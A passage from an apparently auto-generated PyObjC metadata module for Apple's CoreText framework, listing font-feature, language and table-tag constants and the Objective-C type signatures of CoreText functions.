elector@11$kDiphthongLigaturesOnSelector@10$kDisplayTextSelector@1$kEngravedTextSelector@2$kExpertCharactersSelector@10$kExponentsOffSelector@9$kExponentsOnSelector@8$kFleuronsSelector@3$kFontAlbanianLanguage@36$kFontAmharicLanguage@85$kFontAmharicScript@28$kFontArabicLanguage@12$kFontArabicScript@4$kFontArmenianLanguage@51$kFontArmenianScript@24$kFontAssameseLanguage@68$kFontAymaraLanguage@134$kFontAzerbaijanArLanguage@50$kFontAzerbaijaniLanguage@49$kFontBasqueLanguage@129$kFontBengaliLanguage@67$kFontBengaliScript@13$kFontBulgarianLanguage@44$kFontBurmeseLanguage@77$kFontBurmeseScript@19$kFontByelorussianLanguage@46$kFontCatalanLanguage@130$kFontChewaLanguage@92$kFontChineseScript@2$kFontCopyrightName@0$kFontCroatianLanguage@18$kFontCustom16BitScript@2$kFontCustom816BitScript@1$kFontCustom8BitScript@0$kFontCustomPlatform@4$kFontCyrillicScript@7$kFontCzechLanguage@38$kFontDanishLanguage@7$kFontDescriptionName@10$kFontDesignerName@9$kFontDesignerURLName@12$kFontDevanagariScript@9$kFontDutchLanguage@4$kFontDzongkhaLanguage@137$kFontEastEuropeanRomanScript@29$kFontEnglishLanguage@0$kFontEsperantoLanguage@94$kFontEstonianLanguage@27$kFontEthiopicScript@28$kFontExtendedArabicScript@31$kFontFaeroeseLanguage@30$kFontFamilyName@1$kFontFarsiLanguage@31$kFontFinnishLanguage@13$kFontFlemishLanguage@34$kFontFrenchLanguage@1$kFontFullName@4$kFontGallaLanguage@87$kFontGeezScript@28$kFontGeorgianLanguage@52$kFontGeorgianScript@23$kFontGermanLanguage@2$kFontGreekLanguage@14$kFontGreekScript@6$kFontGuaraniLanguage@133$kFontGujaratiLanguage@69$kFontGujaratiScript@11$kFontGurmukhiScript@10$kFontHebrewLanguage@10$kFontHebrewScript@5$kFontHindiLanguage@21$kFontHungarianLanguage@26$kFontISO10646_1993Semantics@2$kFontIcelandicLanguage@15$kFontIndonesianLanguage@81$kFontIrishLanguage@35$kFontItalianLanguage@3$kFontJapaneseLanguage@11$kFontJapaneseScript@1$kFontJavaneseRomLanguage@138$kFontKannadaLanguage@73$kFontKannadaScript@16$kFontKashmiriLanguage@61$kFontKazakhLanguage@48$kFontKhmerLanguage@78$kFontKhmerScript@20$kFontKirghizLanguage@54$kFontKoreanLanguage@23$kFontKoreanScript@3$kFontKurdishLanguage@60$kFontLaoLanguage@79$kFontLaotianScript@22$kFontLappishLanguage@29$kFontLastReservedName@255$kFontLatinLanguage@131$kFontLatvianLanguage@28$kFontLettishLanguage@28$kFontLicenseDescriptionName@13$kFontLicenseInfoURLName@14$kFontLithuanianLanguage@24$kFontMacCompatibleFullName@18$kFontMacedonianLanguage@43$kFontMacintoshPlatform@1$kFontMalagasyLanguage@93$kFontMalayArabicLanguage@84$kFontMalayRomanLanguage@83$kFontMalayalamLanguage@72$kFontMalayalamScript@17$kFontMalteseLanguage@16$kFontManufacturerName@8$kFontMarathiLanguage@66$kFontMicrosoftPlatform@3$kFontMicrosoftStandardScript@1$kFontMicrosoftSymbolScript@0$kFontMicrosoftUCS4Script@10$kFontMoldavianLanguage@53$kFontMongolianCyrLanguage@58$kFontMongolianLanguage@57$kFontMongolianScript@27$kFontNepaliLanguage@64$kFontNoLanguageCode@4294967295$kFontNoNameCode@4294967295$kFontNoPlatformCode@4294967295$kFontNoScriptCode@4294967295$kFontNorwegianLanguage@9$kFontOriyaLanguage@71$kFontOriyaScript@12$kFontOromoLanguage@87$kFontPashtoLanguage@59$kFontPersianLanguage@31$kFontPolishLanguage@25$kFontPortugueseLanguage@8$kFontPostScriptCIDName@20$kFontPostscriptName@6$kFontPreferredFamilyName@16$kFontPreferredSubfamilyName@17$kFontPunjabiLanguage@70$kFontQuechuaLanguage@132$kFontRSymbolScript@8$kFontReservedPlatform@2$kFontRomanScript@0$kFontRomanianLanguage@37$kFontRuandaLanguage@90$kFontRundiLanguage@91$kFontRussian@7$kFontRussianLanguage@32$kFontSaamiskLanguage@29$kFontSampleTextName@19$kFontSanskritLanguage@65$kFontSerbianLanguage@42$kFontSimpChineseLanguage@33$kFontSimpleChineseScript@25$kFontSindhiLanguage@62$kFontSindhiScript@31$kFontSinhaleseLanguage@76$kFontSinhaleseScript@18$kFontSlavicScript@29$kFontSlovakLanguage@39$kFontSlovenianLanguage@40$kFontSomaliLanguage@88$kFontSpanishLanguage@6$kFontStyleName@2$kFontSundaneseRomLanguage@139$kFontSwahiliLanguage@89$kFontSwedishLanguage@5$kFontTagalogLanguage@82$kFontTajikiLanguage@55$kFontTamilLanguage@74$kFontTamilScript@14$kFontTatarLanguage@135$kFontTeluguLanguage@75$kFontTeluguScript@15$kFontThaiLanguage@22$kFontThaiScript@21$kFontTibetanLanguage@63$kFontTibetanScript@26$kFontTigrinyaLanguage@86$kFontTradChineseLanguage@19$kFontTrademarkName@7$kFontTraditionalChineseScript@2$kFontTurkishLanguage@17$kFontTurkmenLanguage@56$kFontUighurLanguage@136$kFontUkrainianLanguage@45$kFontUnicodeDefaultSemantics@0$kFontUnicodePlatform@0$kFontUnicodeV1_1Semantics@1$kFontUnicodeV2_0BMPOnlySemantics@3$kFontUnicodeV2_0FullCoverageSemantics@4$kFontUnicodeV4_0VariationSequenceSemantics@5$kFontUnicode_FullRepertoire@6$kFontUninterpretedScript@32$kFontUniqueName@3$kFontUrduLanguage@20$kFontUzbekLanguage@47$kFontVendorURLName@11$kFontVersionName@5$kFontVietnameseLanguage@80$kFontVietnameseScript@30$kFontWelshLanguage@128$kFontYiddishLanguage@41$kFormInterrobangOffSelector@7$kFormInterrobangOnSelector@6$kFractionsType@11$kFullWidthCJKRomanSelector@3$kFullWidthIdeographsSelector@0$kFullWidthKanaSelector@0$kHalfWidthCJKRomanSelector@0$kHalfWidthIdeographsSelector@2$kHalfWidthTextSelector@2$kHanjaToHangulAltOneSelector@7$kHanjaToHangulAltThreeSelector@9$kHanjaToHangulAltTwoSelector@8$kHanjaToHangulSelector@1$kHideDiacriticsSelector@1$kHiraganaToKatakanaSelector@2$kHistoricalLigaturesOffSelector@21$kHistoricalLigaturesOnSelector@20$kHojoCharactersSelector@12$kHyphenToEnDashOffSelector@3$kHyphenToEnDashOnSelector@2$kHyphenToMinusOffSelector@1$kHyphenToMinusOnSelector@0$kHyphensToEmDashOffSelector@1$kHyphensToEmDashOnSelector@0$kIdeographicAltFiveSelector@5$kIdeographicAltFourSelector@4$kIdeographicAltOneSelector@1$kIdeographicAltThreeSelector@3$kIdeographicAltTwoSelector@2$kIdeographicAlternativesType@30$kIdeographicSpacingType@26$kIlluminatedCapsSelector@3$kInequalityLigaturesOffSelector@7$kInequalityLigaturesOnSelector@6$kInferiorsSelector@2$kInitialCapsAndSmallCapsSelector@5$kInitialCapsSelector@4$kInternationalSymbolsSelector@5$kInvertedBoxAnnotationSelector@9$kInvertedCircleAnnotationSelector@4$kInvertedRoundedBoxAnnotationSelector@10$kItalicCJKRomanType@32$kJIS1978CharactersSelector@2$kJIS1983CharactersSelector@3$kJIS1990CharactersSelector@4$kJIS2004CharactersSelector@11$kJUSTCurrentVersion@65536$kJUSTKashidaPriority@0$kJUSTLetterPriority@2$kJUSTNullPriority@3$kJUSTOverrideLimits@16384$kJUSTOverridePriority@32768$kJUSTOverrideUnlimited@8192$kJUSTPriorityCount@4$kJUSTPriorityMask@3$kJUSTSpacePriority@1$kJUSTStandardFormat@0$kJUSTTag@1786082164$kJUSTUnlimited@4096$kJUSTnoGlyphcode@65535$kJUSTpcConditionalAddAction@2$kJUSTpcDecompositionAction@0$kJUSTpcDuctilityAction@4$kJUSTpcGlyphRepeatAddAction@5$kJUSTpcGlyphStretchAction@3$kJUSTpcUnconditionalAddAction@1$kKERNCrossStream@16384$kKERNCrossStreamResetNote@2$kKERNCurrentVersion@65536$kKERNFormatMask@255$kKERNIndexArray@3$kKERNLineEndKerning@2$kKERNLineStart@1$kKERNNoCrossKerning@4$kKERNNoStakeNote@1$kKERNNotApplied@1$kKERNNotesRequested@8$kKERNOrderedList@0$kKERNResetCrossStream@32768$kKERNSimpleArray@2$kKERNStateTable@1$kKERNTag@1801810542$kKERNUnusedBits@7936$kKERNVariation@8192$kKERNVertical@32768$kKERXActionOffsetMask@16777215$kKERXActionTypeAnchorPoints@1073741824$kKERXActionTypeControlPoints@0$kKERXActionTypeCoordinates@2147483648$kKERXActionTypeMask@3221225472$kKERXControlPoint@4$kKERXCrossStream@1073741824$kKERXCrossStreamResetNote@2$kKERXCurrentVersion@131072$kKERXDescending@268435456$kKERXFormatMask@255$kKERXLineEndKerning@2$kKERXLineStart@1$kKERXNoCrossKerning@4$kKERXNoStakeNote@1$kKERXNotApplied@1$kKERXNotesRequested@8$kKERXOrderedList@0$kKERXResetCrossStream@32768$kKERXSimpleArray@2$kKERXStateTable@1$kKERXTag@1801810552$kKERXUnusedBits@268435200$kKERXUnusedFlags@1056964608$kKERXValuesAreLong@1$kKERXVariation@536870912$kKERXVertical@-2147483648$kKanaSpacingType@25$kKanaToRomanizationSelector@4$kKatakanaToHiraganaSelector@3$kLCARCtlPointFormat@1$kLCARCurrentVersion@65536$kLCARLinearFormat@0$kLCARTag@1818452338$kLTAGCurrentVersion@1$kLanguageTagType@39$kLastFeatureType@-1$kLetterCaseType@3$kLigaturesType@1$kLineFinalSwashesOffSelector@7$kLineFinalSwashesOnSelector@6$kLineInitialSwashesOffSelector@5$kLineInitialSwashesOnSelector@4$kLinguisticRearrangementOffSelector@1$kLinguisticRearrangementOnSelector@0$kLinguisticRearrangementType@5$kLogosOffSelector@7$kLogosOnSelector@6$kLowerCaseNumbersSelector@0$kLowerCasePetiteCapsSelector@2$kLowerCaseSmallCapsSelector@1$kLowerCaseType@37$kMORTContextualType@1$kMORTCoverDescending@16384$kMORTCoverIgnoreVertical@8192$kMORTCoverTypeMask@15$kMORTCoverVertical@32768$kMORTCurrInsertBefore@2048$kMORTCurrInsertCountMask@992$kMORTCurrInsertCountShift@5$kMORTCurrInsertKashidaLike@8192$kMORTCurrJustTableCountMask@127$kMORTCurrJustTableCountShift@0$kMORTCurrentVersion@65536$kMORTDoInsertionsBefore@128$kMORTInsertionType@5$kMORTInsertionsCountMask@63$kMORTIsSplitVowelPiece@64$kMORTLigFormOffsetMask@1073741823$kMORTLigFormOffsetShift@2$kMORTLigLastAction@-2147483648$kMORTLigStoreLigature@1073741824$kMORTLigatureType@2$kMORTMarkInsertBefore@1024$kMORTMarkInsertCountMask@31$kMORTMarkInsertCountShift@0$kMORTMarkInsertKashidaLike@4096$kMORTMarkJustTableCountMask@16256$kMORTMarkJustTableCountShift@7$kMORTRearrangementType@0$kMORTSwashType@4$kMORTTag@1836020340$kMORTraCDx@6$kMORTraCDxA@8$kMORTraCDxAB@12$kMORTraCDxBA@13$kMORTraDCx@7$kMORTraDCxA@9$kMORTraDCxAB@14$kMORTraDCxBA@15$kMORTraDx@2$kMORTraDxA@3$kMORTraDxAB@10$kMORTraDxBA@11$kMORTraNoAction@0$kMORTraxA@1$kMORTraxAB@4$kMORTraxBA@5$kMORXCoverDescending@1073741824$kMORXCoverIgnoreVertical@536870912$kMORXCoverLogicalOrder@268435456$kMORXCoverTypeMask@255$kMORXCoverVertical@-2147483648$kMORXCurrentVersion@131072$kMORXTag@1836020344$kMathSymbolsSelector@6$kMathematicalExtrasType@15$kMathematicalGreekOffSelector@11$kMathematicalGreekOnSelector@10$kMonospacedNumbersSelector@0$kMonospacedTextSelector@1$kNLCCharactersSelector@13$kNoAlternatesSelector@0$kNoAnnotationSelector@0$kNoCJKItalicRomanSelector@0$kNoCJKSymbolAlternativesSelector@0$kNoFractionsSelector@0$kNoIdeographicAlternativesSelector@0$kNoOrnamentsSelector@0$kNoRubyKanaSelector@0$kNoStyleOptionsSelector@0$kNoStylisticAlternatesSelector@0$kNoTransliterationSelector@0$kNonFinalSwashesOffSelector@9$kNonFinalSwashesOnSelector@8$kNormalPositionSelector@0$kNumberCaseType@21$kNumberSpacingType@6$kOPBDControlPointFormat@1$kOPBDCurrentVersion@65536$kOPBDDistanceFormat@0$kOPBDTag@1869636196$kOrdinalsSelector@3$kOrnamentSetsType@16$kOverlappingCharactersType@13$kPROPALDirectionClass@2$kPROPANDirectionClass@6$kPROPBNDirectionClass@19$kPROPCSDirectionClass@7$kPROPCanHangLTMask@16384$kPROPCanHangRBMask@8192$kPROPCurrentVersion@196608$kPROPDirectionMask@31$kPROPENDirectionClass@3$kPROPESDirectionClass@4$kPROPETDirectionClass@5$kPROPIsFloaterMask@32768$kPROPLDirectionClass@0$kPROPLREDirectionClass@13$kPROPLRODirectionClass@14$kPROPNSMDirectionClass@18$kPROPNumDirectionClasses@20$kPROPONDirectionClass@11$kPROPPDFDirectionClass@17$kPROPPSDirectionClass@8$kPROPPairOffsetMask@3840$kPROPPairOffsetShift@8$kPROPPairOffsetSign@7$kPROPRDirectionClass@1$kPROPRLEDirectionClass@15$kPROPRLODirectionClass@16$kPROPRightConnectMask@128$kPROPSDirectionClass@9$kPROPSENDirectionClass@12$kPROPTag@1886547824$kPROPUseRLPairMask@4096$kPROPWSDirectionClass@10$kPROPZeroReserved@96$kParenthesisAnnotationSelector@5$kPartiallyConnectedSelector@1$kPeriodAnnotationSelector@6$kPeriodsToEllipsisOffSelector@11$kPeriodsToEllipsisOnSelector@10$kPiCharactersSelector@2$kPreventOverlapOffSelector@1$kPreventOverlapOnSelector@0$kProportionalCJKRomanSelector@1$kProportionalIdeographsSelector@1$kProportionalKanaSelector@1$kProportionalNumbersSelector@1$kProportionalTextSelector@0$kQuarterWidthNumbersSelector@3$kQuarterWidthTextSelector@4$kRareLigaturesOffSelector@5$kRareLigaturesOnSelector@4$kRebusPicturesOffSelector@9$kRebusPicturesOnSelector@8$kRequiredLigaturesOffSelector@1$kRequiredLigaturesOnSelector@0$kRomanNumeralAnnotationSelector@7$kRomanizationToHiraganaSelector@5$kRomanizationToKatakanaSelector@6$kRoundedBoxAnnotationSelector@2$kRubyKanaOffSelector@3$kRubyKanaOnSelector@2$kRubyKanaSelector@1$kRubyKanaType@28$kSFNTLookupSegmentArray@4$kSFNTLookupSegmentSingle@2$kSFNTLookupSimpleArray@0$kSFNTLookupSingleTable@6$kSFNTLookupTrimmedArray@8$kSFNTLookupVector@10$kSTClassDeletedGlyph@2$kSTClassEndOfLine@3$kSTClassEndOfText@0$kSTClassOutOfBounds@1$kSTKCrossStreamReset@8192$kSTLigActionMask@16383$kSTMarkEnd@8192$kSTNoAdvance@16384$kSTRearrVerbMask@15$kSTSetMark@32768$kSTXHasLigAction@8192$kScientificInferiorsSelector@4$kShowDiacriticsSelector@0$kSimplifiedCharactersSelector@1$kSlashToDivideOffSelector@5$kSlashToDivideOnSelector@4$kSlashedZeroOffSelector@5$kSlashedZeroOnSelector@4$kSmallCapsSelector@3$kSmartQuotesOffSelector@9$kSmartQuotesOnSelector@8$kSmartSwashType@8$kSquaredLigaturesOffSelector@13$kSquaredLigaturesOnSelector@12$kStyleOptionsType@19$kStylisticAltEightOffSelector@17$kStylisticAltEightOnSelector@16$kStylisticAltEighteenOffSelector@37$kStylisticAltEighteenOnSelector@36$kStylisticAltElevenOffSelector@23$kStylisticAltElevenOnSelector@22$kStylisticAltFifteenOffSelector@31$kStylisticAltFifteenOnSelector@30$kStylisticAltFiveOffSelector@11$kStylisticAltFiveOnSelector@10$kStylisticAltFourOffSelector@9$kStylisticAltFourOnSelector@8$kStylisticAltFourteenOffSelector@29$kStylisticAltFourteenOnSelector@28$kStylisticAltNineOffSelector@19$kStylisticAltNineOnSelector@18$kStylisticAltNineteenOffSelector@39$kStylisticAltNineteenOnSelector@38$kStylisticAltOneOffSelector@3$kStylisticAltOneOnSelector@2$kStylisticAltSevenOffSelector@15$kStylisticAltSevenOnSelector@14$kStylisticAltSeventeenOffSelector@35$kStylisticAltSeventeenOnSelector@34$kStylisticAltSixOffSelector@13$kStylisticAltSixOnSelector@12$kStylisticAltSixteenOffSelector@33$kStylisticAltSixteenOnSelector@32$kStylisticAltTenOffSelector@21$kStylisticAltTenOnSelector@20$kStylisticAltThirteenOffSelector@27$kStylisticAltThirteenOnSelector@26$kStylisticAltThreeOffSelector@7$kStylisticAltThreeOnSelector@6$kStylisticAltTwelveOffSelector@25$kStylisticAltTwelveOnSelector@24$kStylisticAltTwentyOffSelector@41$kStylisticAltTwentyOnSelector@40$kStylisticAltTwoOffSelector@5$kStylisticAltTwoOnSelector@4$kStylisticAlternativesType@35$kSubstituteVerticalFormsOffSelector@1$kSubstituteVerticalFormsOnSelector@0$kSuperiorsSelector@1$kSwashAlternatesOffSelector@3$kSwashAlternatesOnSelector@2$kSymbolLigaturesOffSelector@17$kSymbolLigaturesOnSelector@16$kTRAKCurrentVersion@65536$kTRAKTag@1953653099$kTRAKUniformFormat@0$kTallCapsSelector@5$kTextSpacingType@22$kThirdWidthNumbersSelector@2$kThirdWidthTextSelector@3$kTitlingCapsSelector@4$kTraditionalAltFiveSelector@9$kTraditionalAltFourSelector@8$kTraditionalAltOneSelector@5$kTraditionalAltThreeSelector@7$kTraditionalAltTwoSelector@6$kTraditionalCharactersSelector@0$kTraditionalNamesCharactersSelector@14$kTranscodingCompositionOffSelector@5$kTranscodingCompositionOnSelector@4$kTransliterationType@23$kTypographicExtrasType@14$kUnconnectedSelector@0$kUnicodeDecompositionType@27$kUpperAndLowerCaseSelector@0$kUpperCaseNumbersSelector@1$kUpperCasePetiteCapsSelector@2$kUpperCaseSmallCapsSelector@1$kUpperCaseType@38$kVerticalFractionsSelector@1$kVerticalPositionType@10$kVerticalSubstitutionType@4$kWordFinalSwashesOffSelector@3$kWordFinalSwashesOnSelector@2$kWordInitialSwashesOffSelector@1$kWordInitialSwashesOnSelector@0$nameFontTableTag@1851878757$nonGlyphID@65535$os2FontTableTag@1330851634$sizeof_sfntCMapEncoding@8$sizeof_sfntCMapExtendedSubHeader@12$sizeof_sfntCMapHeader@4$sizeof_sfntCMapSubHeader@6$sizeof_sfntDescriptorHeader@8$sizeof_sfntDirectory@12$sizeof_sfntInstance@4$sizeof_sfntNameHeader@6$sizeof_sfntNameRecord@12$sizeof_sfntVariationAxis@20$sizeof_sfntVariationHeader@16$variationFontTableTag@1719034226$''' misc.update({}) functions={'CTFontManagerCreateFontDescriptorsFromURL': (b'^{__CFArray=}^{__CFURL=}', '', {'retval': {'already_cfretained': True}}), 'CTLineCreateTruncatedLine': (b'^{__CTLine=}^{__CTLine=}dI^{__CTLine=}', '', {'retval': {'already_cfretained': True}}), 'CTLineEnumerateCaretOffsets': (b'v^{__CTLine=}@?', '', {'retval': {'type': 'v'}, 'arguments': {1: {'callable': {'retval': {'type': b'v'}, 'arguments': {0: {'type': '^v'}, 1: {'type': 'd'}, 2: {'type': 'L'}, 3: {'type': 'B'}, 4: {'type': 'o^B'}}}, 'block': {'retval': {'type': b'v'}, 'arguments': {0: {'type': b'd'}, 1: {'type': b'q'}, 2: {'type': b'B'}, 3: {'type': b'^B'}}}}}}), 'CTFramesetterCreateFrame': (sel32or64(b'^{__CTFrame=}^{__CTFramesetter=}{_CFRange=ll}^{CGPath=}^{__CFDictionary=}', b'^{__CTFrame=}^{__CTFramesetter=}{_CFRange=qq}^{CGPath=}^{__CFDictionary=}'), '', {'retval': {'already_cfretained': True}}), 'CTTypesetterSuggestClusterBreak': (sel32or64(b'l^{__CTTypesetter=}ld', b'q^{__CTTypesetter=}qd'),), 'CTFontCreateCopyWithFamily': (sel32or64(b'^{__CTFont=}^{__CTFont=}f^{CGAffineTransform=ffffff}^{__CFString=}', b'^{__CTFont=}^{__CTFont=}d^{CGAffineTransform=dddddd}^{__CFString=}'), '', {'retval': {'already_cfretained': True}}), 'CTFontGetGlyphsForCharacters': (sel32or64(b'B^{__CTFont=}^T^Sl', b'B^{__CTFont=}^T^Sq'), '', {'arguments': {1: {'c_array_length_in_arg': 3, 'type_modifier': 'n'}, 2: {'c_array_length_in_arg': 3, 'type_modifier': 'o'}}}), 'CTLineGetPenOffsetForFlush': (sel32or64(b'd^{__CTLine=}fd', b'd^{__CTLine=}dd'),), 'CTTypesetterSuggestLineBreak': (sel32or64(b'l^{__CTTypesetter=}ld', b'q^{__CTTypesetter=}qd'),), 'CTFontCreateWithGraphicsFont': (sel32or64(b'^{__CTFont=}^{CGFont=}f^{CGAffineTransform=ffffff}^{__CTFontDescriptor=}', b'^{__CTFont=}^{CGFont=}d^{CGAffineTransform=dddddd}^{__CTFontDescriptor=}'), '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'n'}}}), 'CTRunGetStringRange': (sel32or64(b'{_CFRange=ll}^{__CTRun=}', b'{_CFRange=qq}^{__CTRun=}'),), 'CTFontCreateWithQuickdrawInstance': (sel32or64(b'^{__CTFont=}*sCf', b'^{__CTFont=}*sCd'), '', {'retval': {'already_cfretained': True}}), 'CTFontManagerUnregisterFontsForURL': (b'B^{__CFURL=}I^^{__CFError=}', '', {'arguments': {2: {'already_cfretained': True, 'type_modifier': 'o', 'null_accepted': True}}}), 'CTFontManagerCreateFontRequestRunLoopSource': (sel32or64(b'^{__CFRunLoopSource=}l@?', b'^{__CFRunLoopSource=}q@?'), '', {'retval': {'already_cfretained': True}, 'arguments': {1: {'callable': {'retval': {'type': b'@'}, 'arguments': {0: {'type': '^v'}, 1: {'type': '@'}, 2: {'type': 'i'}}}}}}), 'CTFontManagerRequestFonts': (b'v^{__CFArray=}@?', '', {'arguments': {1: {'block': {'retval': {'type': b'v'}, 'arguments': {0: {'type': b'^{__CFArray=}'}}}}}}), 'CTRubyAnnotationCreateWithAttributes': (b'@LLL@@', '', {'retval': {'already_cfretained': True}}), 'CTFontDescriptorMatchFontDescriptorsWithProgressHandler': (b'B^{__CFArray=}^{__CFSet=}@?',), 'CTGlyphInfoGetGlyph': (b'S^{__CTGlyphInfo=}',), 'CTFontManagerUnregisterFontURLs': (b'v^{__CFArray=}I@?', '', {'arguments': {2: {'callable': {'retval': {'type': b'B'}, 'arguments': {0: {'type': '^v'}, 1: {'type': '@'}, 2: {'type': 'B'}}}, 'block': {'retval': {'type': b'B'}, 'arguments': {0: {'type': b'^{__CFArray=}'}, 1: {'type': b'B'}}}}}}), 'CTFontManagerCreateFontDescriptorsFromData': (b'^{__CFArray=}^{__CFData=}', '', {'retval': {'already_cfretained': True}}), 'CTRunDelegateGetTypeID': (sel32or64(b'L', b'Q'),), 'CTFontManagerRegisterFontURLs': (b'v^{__CFArray=}IB@?', '', {'arguments': {3: {'callable': {'retval': {'type': b'B'}, 'arguments': {0: {'type': '^v'}, 1: {'type': '@'}, 2: {'type': 'B'}}}, 'block': {'retval': {'type': b'B'}, 'arguments': {0: {'type': b'^{__CFArray=}'}, 1: {'type': b'B'}}}}}}), 'CTFontCopyAvailableTables': (b'^{__CFArray=}^{__CTFont=}I', '', {'retval': {'already_cfretained': True}}), 'CTFontManagerCompareFontFamilyNames': (sel32or64(b'l^{__CFString=}^{__CFString=}^v', b'q^{__CFString=}^{__CFString=}^v'),), 'CTRubyAnnotationCreate': (sel32or64(b'^{__CTRubyAnnotation=}CCf[4^{__CFString=}]', b'^{__CTRubyAnnotation=}CCd[4^{__CFString=}]'), '', {'retval': {'already_cfretained': True}, 'arguments': {3: {'type_modifier': 'n'}}}), 'CTRunGetStringIndicesPtr': (sel32or64(b'r^i^{__CTRun=}', b'r^q^{__CTRun=}'), '', {'retval': {'c_array_of_variable_length': True}}), 'CTFontGetAscent': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTFontManagerRegisterGraphicsFont': (b'B^{CGFont=}^^{__CFError=}', '', {'arguments': {1: {'already_cfretained': True, 'type_modifier': 'o', 'null_accepted': True}}}), 'CTFontCollectionCopyQueryDescriptors': (b'^{__CFArray=}^{__CTFontCollection=}', '', {'retval': {'already_cfretained': True}}), 'CTTypesetterCreateLine': (sel32or64(b'^{__CTLine=}^{__CTTypesetter=}{_CFRange=ll}', b'^{__CTLine=}^{__CTTypesetter=}{_CFRange=qq}'), '', {'retval': {'already_cfretained': True}}), 'CTFontManagerRegisterFontDescriptors': (b'v^{__CFArray=}IB@?', '', {'arguments': {3: {'callable': {'retval': {'type': b'B'}, 'arguments': {0: {'type': '^v'}, 1: {'type': '@'}, 2: {'type': 'B'}}}, 'block': {'retval': {'type': b'B'}, 'arguments': {0: {'type': b'^{__CFArray=}'}, 1: {'type': b'B'}}}}}}), 'CTFontGetDescent': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTFontCreateWithFontDescriptor': (sel32or64(b'^{__CTFont=}^{__CTFontDescriptor=}f^{CGAffineTransform=ffffff}', b'^{__CTFont=}^{__CTFontDescriptor=}d^{CGAffineTransform=dddddd}'), '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'n'}}}), 'CTRunGetAttributes': (b'^{__CFDictionary=}^{__CTRun=}',), 'CTFontCopySupportedLanguages': (b'^{__CFArray=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCopyVariationAxes': (b'^{__CFArray=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTTextTabGetLocation': (b'd^{__CTTextTab=}',), 'CTFontCopyPostScriptName': (b'^{__CFString=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCopyDefaultCascadeListForLanguages': (b'^{__CFArray=}^{__CTFont=}^{__CFArray=}', '', {'retval': {'already_cfretained': True}}), 'CTFontGetVerticalTranslationsForGlyphs': (sel32or64(b'v^{__CTFont=}^S^{_NSSize=ff}l', b'v^{__CTFont=}^S^{CGSize=dd}q'), '', {'arguments': {1: {'c_array_length_in_arg': 3, 'type_modifier': 'n'}, 2: {'c_array_length_in_arg': 3, 'type_modifier': 'o'}}}), 'CTFontGetTypeID': (sel32or64(b'L', b'Q'),), 'CTFontCollectionCreateMatchingFontDescriptorsWithOptions': (b'^{__CFArray=}^{__CTFontCollection=}^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTFramesetterCreateWithAttributedString': (b'^{__CTFramesetter=}^{__CFAttributedString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCreatePathForGlyph': (sel32or64(b'^{CGPath=}^{__CTFont=}S^{CGAffineTransform=ffffff}', b'^{CGPath=}^{__CTFont=}S^{CGAffineTransform=dddddd}'), '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'n'}}}), 'CTFrameDraw': (b'v^{__CTFrame=}^{CGContext=}',), 'CTFontCollectionCopyExclusionDescriptors': (b'^{__CFArray=}^{__CTFontCollection=}', '', {'retval': {'already_cfretained': True}}), 'CTRunGetBaseAdvancesAndOrigins': (b'v^{__CTRun=}{_CFRange=qq}^{CGSize=dd}^{CGPoint=dd}', '', {'arguments': {2: {'c_array_length_in_arg': 1, 'type_modifier': 'o'}, 3: {'c_array_length_in_arg': 1, 'type_modifier': 'o'}}}), 'CTFontManagerGetAutoActivationSetting': (b'I^{__CFString=}',), 'CTFontGetOpticalBoundsForGlyphs': (sel32or64(b'{CGRect={CGPoint=ff}{CGSize=ff}}^{__CTFont=}^S^{_NSRect={_NSPoint=ff}{_NSSize=ff}}lL', b'{CGRect={CGPoint=dd}{CGSize=dd}}^{__CTFont=}^S^{CGRect={CGPoint=dd}{CGSize=dd}}qQ'), '', {'arguments': {1: {'c_array_length_in_arg': 3, 'type_modifier': 'n'}, 2: {'c_array_length_in_arg': 3, 'type_modifier': 'o'}}}), 'CTFontManagerUnregisterFontDescriptors': (b'v^{__CFArray=}I@?', '', {'arguments': {2: {'callable': {'retval': {'type': b'B'}, 'arguments': {0: {'type': '^v'}, 1: {'type': '@'}, 2: {'type': 'B'}}}, 'block': {'retval': {'type': b'B'}, 'arguments': {0: {'type': b'^{__CFArray=}'}, 1: {'type': b'B'}}}}}}), 'CTFontDescriptorCopyAttribute': (b'@^{__CTFontDescriptor=}^{__CFString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCreateWithFontDescriptorAndOptions': (sel32or64(b'^{__CTFont=}^{__CTFontDescriptor=}f^{CGAffineTransform=ffffff}L', b'^{__CTFont=}^{__CTFontDescriptor=}d^{CGAffineTransform=dddddd}Q'), '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'n'}}}), 'CTFontGetMatrix': (sel32or64(b'{CGAffineTransform=ffffff}^{__CTFont=}', b'{CGAffineTransform=dddddd}^{__CTFont=}'),), 'CTFontGetSymbolicTraits': (b'I^{__CTFont=}',), 'CTFontCreateCopyWithAttributes': (sel32or64(b'^{__CTFont=}^{__CTFont=}f^{CGAffineTransform=ffffff}^{__CTFontDescriptor=}', b'^{__CTFont=}^{__CTFont=}d^{CGAffineTransform=dddddd}^{__CTFontDescriptor=}'), '', {'retval': {'already_cfretained': True}}), 'CTRubyAnnotationGetSizeFactor': (sel32or64(b'f^{__CTRubyAnnotation=}', b'd^{__CTRubyAnnotation=}'),), 'CTFontCollectionCopyFontAttribute': (b'^{__CFArray=}^{__CTFontCollection=}^{__CFString=}I', '', {'retval': {'already_cfretained': True}}), 'CTFontCopyFamilyName': (b'^{__CFString=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTGlyphInfoGetTypeID': (sel32or64(b'L', b'Q'),), 'CTParagraphStyleCreate': (sel32or64(b'^{__CTParagraphStyle=}^{CTParagraphStyleSetting=II^v}L', b'^{__CTParagraphStyle=}^{CTParagraphStyleSetting=IQ^v}Q'), '', {'retval': {'already_cfretained': True}, 'arguments': {0: {'c_array_length_in_arg': 1, 'type_modifier': 'n'}}}), 'CTRunGetImageBounds': 